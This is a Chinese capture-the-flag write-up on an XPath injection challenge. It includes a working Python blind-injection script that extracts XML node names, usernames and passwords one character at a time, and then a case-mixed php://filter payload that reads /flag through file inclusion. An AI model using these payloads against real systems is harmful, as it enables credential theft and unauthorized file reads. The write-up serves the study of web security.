考点为xpath注入.
打开页面是个登录框,用户名密码随意输了一下,点击登录显示登录超时请刷新页面,f12可以看到用了token,更新的速度挺快的.刷新后登录,抓包,发现是login.php,并且用到了xml.尝试xxe发现不可行,要用xpath盲注.xpath注入详解
尝试注入发现若语句为真则显示非法操作,为假则显示用户名或密码错误.
上脚本:
import requests
def req(username):
import re
url = 'http://0a92d237-bdc8-443b-ae58-0693cf408aac.node3.buuoj.cn/login.php'
password = ''
s = requests.session()
r = s.get(url).content
re = re.search(r'value="(.*?)" />', r.decode('utf-8'))
token = re.group(0)[7:-4]
headers = {
'Content-Type': 'application/xml',
}
data = '<username>'+username+'</username>''<password>'+password+'</password>''<token>'+token+'</token>'
r = s.post(url,data=data,headers=headers).content
if '非法操作' in r.decode('utf-8'):
return 1
else:
return 0
flag = ''
for i in range(1,50):
print(i)
for j in range(32,127):
#username = "' or substring(name(/*[1]),{},1)='{}' or '1".format(i,chr(j))
#username = "' or substring(name(/root/*[1]),{},1)='{}' or '1".format(i,chr(j))
#username = "' or substring(name(/root/accounts/*[1]),{},1)='{}' or '1".format(i,chr(j))
#username = "' or substring(name(/root/accounts/user/*[1]),{},1)='{}' or '1".format(i, chr(j))
#username = "' or substring(name(/root/accounts/user/*[2]),{},1)='{}' or '1".format(i, chr(j))
#username = "' or substring(name(/root/accounts/user/*[3]),{},1)='{}' or '1".format(i, chr(j))
#username = "' or substring(/root/accounts/user[1]/username,{},1)='{}' or '1".format(i, chr(j))
#username = "' or substring(/root/accounts/user[2]/username,{},1)='{}' or '1".format(i, chr(j))
username = "' or substring(/root/accounts/user[2]/password,{},1)='{}' or '1".format(i,chr(j))
if req(username) == 1:
flag += chr(j)
print(flag)
break
拿到账号和密码后登录,注意到url处?file=welcome,f12后看到ZmxhZyBpcyBpbiAvZmxhZwo=,base64解码后得知flag在/flag,用文件包含,过滤了php和base,大小写绕过:
pHp://filter/convert.Base64-encode/resource=/flag,f12看到一串base64编码的字符串,解码得flag.
No responses yet